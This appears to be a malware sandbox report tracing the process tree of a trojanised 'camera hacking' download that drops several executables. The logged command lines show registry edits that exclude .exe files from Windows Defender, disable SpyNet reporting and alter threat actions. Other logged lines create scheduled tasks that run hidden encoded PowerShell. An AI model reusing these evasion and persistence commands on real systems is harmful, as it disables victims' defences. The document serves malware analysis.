PID 2724 wrote to memory of 4500	2724	vzlom-kamer-by-neit_wcEYk7hQ.exe	is-75BBU.tmp
PID 4500 wrote to memory of 1096	4500	is-75BBU.tmp	net.exe
PID 4500 wrote to memory of 1096	4500	is-75BBU.tmp	net.exe
PID 4500 wrote to memory of 1096	4500	is-75BBU.tmp	net.exe
PID 4500 wrote to memory of 4668	4500	is-75BBU.tmp	IC329.exe
PID 4500 wrote to memory of 4668	4500	is-75BBU.tmp	IC329.exe
PID 4500 wrote to memory of 4668	4500	is-75BBU.tmp	IC329.exe
PID 1096 wrote to memory of 3756	1096	net.exe	net1.exe
PID 1096 wrote to memory of 3756	1096	net.exe	net1.exe
PID 1096 wrote to memory of 3756	1096	net.exe	net1.exe
PID 4500 wrote to memory of 1264	4500	is-75BBU.tmp	net.exe
PID 4500 wrote to memory of 1264	4500	is-75BBU.tmp	net.exe
PID 4500 wrote to memory of 1264	4500	is-75BBU.tmp	net.exe
PID 4500 wrote to memory of 2144	4500	is-75BBU.tmp	IC329.exe
PID 4500 wrote to memory of 2144	4500	is-75BBU.tmp	IC329.exe
PID 4500 wrote to memory of 2144	4500	is-75BBU.tmp	IC329.exe
PID 1264 wrote to memory of 1684	1264	net.exe	net1.exe
PID 1264 wrote to memory of 1684	1264	net.exe	net1.exe
PID 1264 wrote to memory of 1684	1264	net.exe	net1.exe
PID 2144 wrote to memory of 2772	2144	IC329.exe	DMfcPC.exe
PID 2144 wrote to memory of 2772	2144	IC329.exe	DMfcPC.exe
PID 2144 wrote to memory of 2772	2144	IC329.exe	DMfcPC.exe
PID 2144 wrote to memory of 3124	2144	IC329.exe	71r9O7Y9zIfGXmeBiL.exe
PID 2144 wrote to memory of 3124	2144	IC329.exe	71r9O7Y9zIfGXmeBiL.exe
PID 2144 wrote to memory of 3124	2144	IC329.exe	71r9O7Y9zIfGXmeBiL.exe
PID 2772 wrote to memory of 4036	2772	DMfcPC.exe	is-LA33S.tmp
PID 2772 wrote to memory of 4036	2772	DMfcPC.exe	is-LA33S.tmp
PID 2772 wrote to memory of 4036	2772	DMfcPC.exe	is-LA33S.tmp
PID 4036 wrote to memory of 2444	4036	is-LA33S.tmp	net.exe
PID 4036 wrote to memory of 2444	4036	is-LA33S.tmp	net.exe
PID 4036 wrote to memory of 2444	4036	is-LA33S.tmp	net.exe
PID 4036 wrote to memory of 3448	4036	is-LA33S.tmp	FileDate329.exe
PID 4036 wrote to memory of 3448	4036	is-LA33S.tmp	FileDate329.exe
PID 4036 wrote to memory of 3448	4036	is-LA33S.tmp	FileDate329.exe
PID 2444 wrote to memory of 32	2444	net.exe	net1.exe
PID 2444 wrote to memory of 32	2444	net.exe	net1.exe
PID 2444 wrote to memory of 32	2444	net.exe	net1.exe
PID 2144 wrote to memory of 2396	2144	IC329.exe	9nx2u.exe
PID 2144 wrote to memory of 2396	2144	IC329.exe	9nx2u.exe
PID 2144 wrote to memory of 2396	2144	IC329.exe	9nx2u.exe
PID 2396 wrote to memory of 2236	2396	9nx2u.exe	is-GRU8E.tmp
PID 2396 wrote to memory of 2236	2396	9nx2u.exe	is-GRU8E.tmp
PID 2396 wrote to memory of 2236	2396	9nx2u.exe	is-GRU8E.tmp
PID 3124 wrote to memory of 2024	3124	71r9O7Y9zIfGXmeBiL.exe	WerFault.exe
PID 3124 wrote to memory of 2024	3124	71r9O7Y9zIfGXmeBiL.exe	WerFault.exe
PID 3124 wrote to memory of 2024	3124	71r9O7Y9zIfGXmeBiL.exe	WerFault.exe
PID 3124 wrote to memory of 4708	3124	71r9O7Y9zIfGXmeBiL.exe	WerFault.exe
PID 3124 wrote to memory of 4708	3124	71r9O7Y9zIfGXmeBiL.exe	WerFault.exe
PID 3124 wrote to memory of 4708	3124	71r9O7Y9zIfGXmeBiL.exe	WerFault.exe
PID 2236 wrote to memory of 4952	2236	is-GRU8E.tmp	SyncBackupShell.exe
PID 2236 wrote to memory of 4952	2236	is-GRU8E.tmp	SyncBackupShell.exe
PID 2236 wrote to memory of 4952	2236	is-GRU8E.tmp	SyncBackupShell.exe
PID 2024 wrote to memory of 3684	2024	WerFault.exe	cmd.exe
PID 2024 wrote to memory of 3684	2024	WerFault.exe	cmd.exe
PID 2024 wrote to memory of 3684	2024	WerFault.exe	cmd.exe
PID 4708 wrote to memory of 4856	4708	WerFault.exe	WerFault.exe
PID 4708 wrote to memory of 4856	4708	WerFault.exe	WerFault.exe
PID 4708 wrote to memory of 4856	4708	WerFault.exe	WerFault.exe
PID 4856 wrote to memory of 3140	4856	WerFault.exe	reg.exe
PID 4856 wrote to memory of 3140	4856	WerFault.exe	reg.exe
PID 4856 wrote to memory of 3140	4856	WerFault.exe	reg.exe
PID 3684 wrote to memory of 3040	3684	cmd.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe
"C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2724

C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmp" /SL4 $80050 "C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe" 4446082 53248
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4500

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 23
3⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 23
4⤵
PID:3756

C:\Program Files (x86)\ImageComparer\IC329.exe
"C:\Program Files (x86)\ImageComparer\IC329.exe"
3⤵
- Executes dropped EXE
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 868
4⤵
- Program crash
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 888
4⤵
- Program crash
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1040
4⤵
- Program crash
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 140
4⤵
- Program crash
PID:1888

C:\Program Files (x86)\ImageComparer\IC329.exe
"C:\Program Files (x86)\ImageComparer\IC329.exe" 72aafdade9cba069152144844a0d25e0
3⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 852
4⤵
- Program crash
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 860
4⤵
- Program crash
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 872
4⤵
- Program crash
PID:1428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 880
4⤵
- Program crash
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1132
4⤵
- Program crash
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1172
4⤵
- Program crash
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1216
4⤵
- Program crash
PID:1768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1192
4⤵
- Program crash
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1200
4⤵
- Program crash
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 952
4⤵
- Program crash
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1144
4⤵
- Program crash
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1620
4⤵
- Program crash
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 972
4⤵
- Program crash
PID:2820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1648
4⤵
- Program crash
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1676
4⤵
- Program crash
PID:2932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1120
4⤵
- Program crash
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1768
4⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1712
4⤵
- Program crash
PID:552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1808
4⤵
- Program crash
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1696
4⤵
- Program crash
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1772
4⤵
- Program crash
PID:2608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1692
4⤵
- Program crash
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1704
4⤵
- Program crash
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1716
4⤵
- Program crash
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 2012
4⤵
- Program crash
PID:3344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1700
4⤵
- Program crash
PID:3216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 2012
4⤵
- Program crash
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1784
4⤵
- Program crash
PID:652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1736
4⤵
- Program crash
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1996
4⤵
- Program crash
PID:3520

C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe
C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe /m SUB=72aafdade9cba069152144844a0d25e0
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2772

C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmp" /SL4 $303AC "C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe" 1559217 52736 /m SUB=72aafdade9cba069152144844a0d25e0
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 20
6⤵
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 20
7⤵
PID:32

C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe
"C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe" /m SUB=72aafdade9cba069152144844a0d25e0
6⤵
- Checks computer location settings
- Executes dropped EXE
PID:3448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate329.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe" & exit
7⤵
PID:4256

C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe
C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe /S /site_id=690689
4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3124

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
- Suspicious use of WriteProcessMemory
PID:3684

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:2136

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:3040

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:4856

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:2800

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:3140

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gOonaGCFB" /SC once /ST 11:24:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:1124

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gOonaGCFB"
5⤵
PID:4660

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gOonaGCFB"
5⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bIIVPNBwJtQvPFWhKj" /SC once /ST 21:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe\" DF /site_id 690689 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1344
4⤵
- Program crash
PID:516

C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe
C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2396

C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmp" /SL4 $203F2 "C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe" 1906126 51712
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2236

C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe
"C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1248
4⤵
- Program crash
PID:2864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1656
4⤵
- Program crash
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1248
4⤵
- Program crash
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1644
4⤵
- Program crash
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1936
4⤵
- Program crash
- Suspicious use of WriteProcessMemory
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 2004
4⤵
- Program crash
- Suspicious use of WriteProcessMemory
PID:4708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1972
4⤵
- Program crash
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1644
4⤵
- Program crash
PID:792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1648
4⤵
- Program crash
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1704
4⤵
- Program crash
PID:2896

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause ImageComparer329
3⤵
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause ImageComparer329
4⤵
PID:1684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4668 -ip 4668
1⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668
1⤵
PID:1356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4668 -ip 4668
1⤵
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4668 -ip 4668
1⤵
PID:1952

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 2144
1⤵
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144
1⤵
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2144 -ip 2144
1⤵
PID:936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 2144
1⤵
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144
1⤵
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 2144
1⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 2144
1⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 2144
1⤵
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 2144
1⤵
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 2144
1⤵
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2144 -ip 2144
1⤵
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2144 -ip 2144
1⤵
PID:548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 2144
1⤵
PID:3508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 2144
1⤵
PID:336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2144 -ip 2144
1⤵
PID:4708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2144 -ip 2144
1⤵
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 2144
1⤵
PID:1204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2144 -ip 2144
1⤵
PID:3212

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2144 -ip 2144
1⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2144 -ip 2144
1⤵
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2144 -ip 2144
1⤵
PID:4120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 2144
1⤵
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 2144
1⤵
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 2144
1⤵
PID:532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 2144
1⤵
PID:2204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 2144
1⤵
PID:392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144
1⤵
PID:3904

C:\Users\Admin\Documents\vzlom_kamer_by_neit.rar_id25861706.exe
"C:\Users\Admin\Documents\vzlom_kamer_by_neit.rar_id25861706.exe"
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 2144
1⤵
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2144 -ip 2144
1⤵
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2144 -ip 2144
1⤵
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2144 -ip 2144
1⤵
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2144 -ip 2144
1⤵
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2144 -ip 2144
1⤵
PID:2304

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "FileDate329.exe" /f
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2144 -ip 2144
1⤵
PID:3188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2144 -ip 2144
1⤵
PID:2348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2144 -ip 2144
1⤵
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2144 -ip 2144
1⤵
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4412

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144
1⤵
PID:1376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 2144
1⤵
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 2144
1⤵
PID:1204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2144 -ip 2144
1⤵
PID:2556

C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe
C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe DF /site_id 690689 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD 